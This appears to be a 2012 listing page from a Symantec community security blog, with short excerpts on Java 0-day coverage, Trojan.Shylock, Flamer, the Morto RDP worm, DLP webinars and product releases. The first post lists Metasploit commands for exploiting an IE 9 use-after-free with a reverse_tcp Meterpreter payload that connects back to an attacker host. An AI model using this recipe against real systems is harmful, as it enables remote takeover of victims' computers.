Video Screencast Help
Security Community Blog
Showing posts tagged with Symantec Protection Suites (SPS)
Showing posts in English
Fabiano.Pessoa | 27 Sep 2012 | 0 comments

Hello
We got a discovered vulnerability in IE 9 on 17/09/2012 which can be exploited as following command in Backtrack 5 R2

Metasploit:

- msfupdate
- Use exploit / windows / browser / ie_execcommand_uaf
- Set SRVHOST 192,168 ...
- Set PAYLOAD windows / Meterpreter / reverse_tcp
- Set LHOST 192,168 ...
- exploit

Let's beware the networking.

hugs

Brandon Noble | 11 Sep 2012 | 0 comments

As a Security Response Liaison, I’m often asked for links to specific information that's available on our public website. Here is a simple list of the more common pages I use for reference.
 

File-Based Protection (Traditional Antivirus)more info

Brandon Noble | 30 Aug 2012 | 7 comments

Greetings everyone.

We are still getting a lot of questions about Symantec's coverage of the most recent Java 0-Day. I thought I would take a moment to jot down a list of our current coverage for this event, and hopefully save everyone some time and hassle.

Current Coverage:

  • ...
Brandon Noble | 23 Aug 2012 | 0 comments

We have been seeing a recent wave of Trojan.Shylock variants with a lot of additional functionality than the older versions we have been used to.

Initially, many of these variants are detected generically as Backdoor.Trojan or Trojan Horse, but our new Shylock heuristic signatures (Trojan.Shylock!gen6 and Trojan.Shylock!gen7) should be changing this to a more accurate naming convention, and should be picking up a much wider spread of these threats.

Additionally we are hearing about some behavior that we have not been able to reproduce. Reports are saying that legitimate documents are getting hidden and then shortcuts with the same name of the document are being added in their place. These shortcuts actually launch a thumbs.db(x) file which is the Shylock Trojan, and they are meant to trick the user into running the threat. This is common behavior of for threats, as noted in this blog article from May 2012,...

Jhildy11 Xcend Group | 14 Aug 2012 | 0 comments

In case you missed it, see the archived version from last weeks webinar " Learn How to Protect Even Your Hardest-to-Find IP with Intelligent Data Loss Prevention"

 

 

With the average cost of a breach now topping an incomprehensible $7 million, more and more organizations are looking to Data Loss Prevention solutions to protect their highest value data. Join XCEND, a Platinum Symantec partner and DLP Master Specialist, to learn how you can accurately detect and protect all types of confidential data wherever it is stored or used.  (54 min)
 
Here's the Link to see the Archived Version: https://www2.gotomeeting.com/register/430279362 or go to our website at www.xcendgroup.com  to...
BJT | 04 Jun 2012 | 0 comments

At this time, Flamer seems to have targeted only a few hundred organizations and individuals located in a small segment of the globe. But make no mistake; Flamer is important worldwide.  The complexity of the code within Flamer is on par with that seen in Stuxnet; arguably the most complex piece of malware Symantec has analyzed to date.  However the mission of Flamer is much different from that of Stuxnet, which was designed to deliver a payload that disrupted the systems it was targeted toward.  Symantec and others’ research indicates that Flamer, as of this moment; is purely focused on capture and exfiltration of sensitive information.
   
The good news for our public sector customers is that Symantec has protections in place to detect this threat (W32.Flamer). Specifically, we have:

  • AntiVirus, AntiSpyware, IPS component, Symantec Insight, and Heuristics detection and conviction measures in Symantec Protection Suite...
Beverly van de Velde | 29 Mar 2012 | 0 comments

Education Enablement Services is developing a Symantec Cloud Security Essentials course that combines the CSA training in order to achieve the CCSK credential & a Symantec Certified Professional (SCP) in Cloud Security credential. 

This is an open call for your experiences with reviewing, designing, or implementing security solutions in a cloud environment.  These could come from situations unique to the cloud (ex. compliance issues for systems in a public cloud) - OR - general security solutions addressed in cloud environments (ex. how existing encryption policies were applied to a cloud architecture). 

We need your:
• Specific examples of security solutions in cloud environments
• Example cloud architectures – good or bad – implemented by customers
• Key questions, challenges, and concerns from customers migrating their infrastructure to...

Brandon Noble | 01 Sep 2011 | 0 comments

Over the weekend, Microsoft and F-secure issued warnings about a new global threat called “Morto”, and The Internet Storm Center has been seeing a large spike in traffic on Port 3389.

The spike looks to have been caused by the RDP (Remote Desktop) portion of the worm calling around looking for RDP connections. Once it finds one, it uses a small list of weak passwords and  ..pwnage ensues.

Symantec detects this threat as W32.Morto and Security Response and will continue to perform deeper analysis throughout the next several days. So far, they have uncovered several dozen different MD5s that are all part of this same threat family.

 

Signs of Morto in your environment

As we learned with W32.Downadup:
Brute force attacks + Small list of passwords = Account lockouts.

As...

KatieBurton | 26 Aug 2011 | 0 comments

Bit9, the market leader in adaptive application whitelisting, has announced their integration with Symantec Protection Center, Symantec’s centralized security management console.

"To effectively mitigate security risks in their environment, our customers need visibility into proven third-party solutions like Bit9 Parity Suite. By providing single sign-on and data integration between our technologies, we are able to expand our customers' view into local security events and enable them to more quickly mitigate endpoint security risks," said Matthew Steele, Senior Director of Product Management at Symantec.

About Bit9 Parity Suite

Bit9's Parity Suite's adaptive application whitelisting solution protects organizations from modern cyber security threats. It accomplishes...

KatieBurton | 01 Aug 2011 | 9 comments

Friday July 29th Symantec Protection Center 2.0 was released for General Availability. This release focused on extending the integrations found in our 1.0 release, third party products and the Symantec Global Intelligence Network to provide existing Symantec customers with relevant, actionable security intelligence. See below for an overview of the release and what our beta customers are saying! Protection Center is a free product, available at no additional charge for existing Symantec customers.

Response from Beta Customers

“One stop shop.. In my book it will empower my team.” – Fortune 500 financial services organization
“Install was easy, simply brilliant!” – European IT Value Added Reseller (VAR)
“Already plugging this to my clients, big time” – Enterprise IT Value Added Reseller (VAR)
“Will absolutely recommend to customers with integrated products” – Government IT...